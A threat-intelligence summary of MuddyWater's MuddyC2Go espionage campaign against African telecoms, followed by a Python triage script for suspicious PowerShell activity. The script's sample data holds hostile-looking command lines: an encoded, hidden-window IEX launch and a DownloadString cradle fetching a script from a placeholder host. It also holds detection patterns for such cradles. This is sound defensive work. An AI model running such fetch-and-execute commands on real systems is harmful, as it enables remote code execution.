Iranian hackers affiliated with the nation-state actor known as MuddyWater have been conducting telecom espionage attacks in Africa using a new command-and-control (C2) framework called MuddyC2Go. The attacks have primarily targeted the telecommunications sector in Egypt, Sudan, and Tanzania. MuddyWater, which is believed to be affiliated with Iran’s Ministry of Intelligence and Security, has been active since at least 2017 and focuses on entities in the Middle East. The use of MuddyC2Go was first discovered by Deep Instinct, and evidence suggests it may have been in use since 2020.
The full capabilities of MuddyC2Go are not yet known, but it includes an executable that automatically connects to the hackers’ C2 server, giving them remote access to the victim system without the need for manual execution. The recent attacks in November 2023 also involved the use of SimpleHelp and Venom Proxy, along with a custom keylogger and other publicly available tools. MuddyWater’s attack chains typically involve weaponizing phishing emails and exploiting known vulnerabilities in unpatched applications for initial access, followed by conducting reconnaissance, lateral movement, and data collection.
In one documented attack on a telecommunications organization, the MuddyC2Go launcher was used to establish contact with an attacker-controlled server, while legitimate remote access software such as AnyDesk and SimpleHelp was deployed alongside it. The attackers had previously compromised the same entity earlier in 2023, using SimpleHelp to launch PowerShell and deliver proxy software. Another telecommunications and media company targeted by the group saw multiple incidents of SimpleHelp connecting to known Seedworm infrastructure (Seedworm is Symantec's name for MuddyWater), along with the use of a custom build of the Venom Proxy hacktool and a new custom keylogger.
MuddyWater seeks to evade detection for as long as possible by using a combination of bespoke, living-off-the-land, and publicly available tools in its attack chains. The group continues to innovate and develop its toolset to stay under the radar. PowerShell and PowerShell-related tools and scripts are still heavily used by the group, highlighting the need for organizations to be vigilant about suspicious PowerShell activity on their networks.
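The closing point about watching for suspicious PowerShell activity is the one a detection engineer can act on directly. The following is an added example, not code from the original article or from any of the vendors it cites: a small triage pass over process command lines of the kind a Sysmon Event ID 1 or Windows 4688 feed carries. The sample command lines are constructed for the example and are not MuddyWater artifacts; the indicators (encoded commands, hidden windows, execution-policy bypass, download cradles, Invoke-Expression) are generic living-off-the-land signals rather than signatures for this actor. The script also decodes `-EncodedCommand` payloads so that indicators hidden inside the Base64 are scored too.

```python
import base64
import re
from typing import Dict, List

# Constructed sample process command lines (not real MuddyWater artifacts).
# The encoded argument in the second line is the UTF-16LE/Base64 form of
# "IEX (New-Object Net.WebClient)", built for this example.
SAMPLE_COMMAND_LINES = [
    r"powershell.exe -NoProfile -Command Get-ChildItem C:\Logs",
    r"powershell.exe -nop -w hidden -ep bypass -enc "
    r"SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA",
    r"powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')",
    r"powershell.exe -File C:\Scripts\backup.ps1",
]

# PowerShell accepts unambiguous prefixes of -EncodedCommand; cover the common ones.
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# Generic living-off-the-land indicators (assumed heuristics, not vendor signatures).
INDICATORS = {
    "encoded_command": ENCODED_ARG,
    "hidden_window": re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden\b"),
    "policy_bypass": re.compile(r"(?i)(?:^|\s)-e(?:xecutionpolicy|p)\s+bypass\b"),
    "download_cradle": re.compile(r"(?i)\b(?:DownloadString|DownloadFile|Invoke-WebRequest|iwr)\b"),
    "invoke_expression": re.compile(r"(?i)(?:\bIEX\b|Invoke-Expression)"),
}


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload, or "" if none or undecodable."""
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return ""
    try:
        raw = base64.b64decode(match.group(1), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""
    # PowerShell encodes the argument as UTF-16LE.
    return raw.decode("utf-16-le", errors="replace")


def analyze(cmdline: str) -> Dict[str, object]:
    """Score one command line; indicators found in the decoded payload count as well."""
    decoded = decode_encoded_command(cmdline)
    hits = set()
    for name, pattern in INDICATORS.items():
        if pattern.search(cmdline) or (decoded and pattern.search(decoded)):
            hits.add(name)
    return {
        "cmdline": cmdline,
        "decoded": decoded,
        "indicators": sorted(hits),
        "score": len(hits),
    }


def triage(cmdlines: List[str], threshold: int = 2) -> List[Dict[str, object]]:
    """Return command lines at or above the threshold, highest score first."""
    results = [analyze(line) for line in cmdlines]
    flagged = [r for r in results if r["score"] >= threshold]
    return sorted(flagged, key=lambda r: r["score"], reverse=True)


if __name__ == "__main__":
    for entry in triage(SAMPLE_COMMAND_LINES):
        print(f"score={entry['score']} indicators={entry['indicators']}")
        print(f"  cmdline: {entry['cmdline']}")
        if entry["decoded"]:
            print(f"  decoded: {entry['decoded']}")
```

The threshold of two indicators is a starting point, not a tuned value: `-File` and `-NoProfile` alone are common in legitimate administration, which is why the benign sample lines score zero, while an encoded, hidden, policy-bypassed launch scores on the raw line and again on its decoded body. In production this logic belongs in the SIEM's query language, fed by Script Block Logging (Event ID 4104) as well as process creation events, so that scripts launched through remote-support tools are captured too.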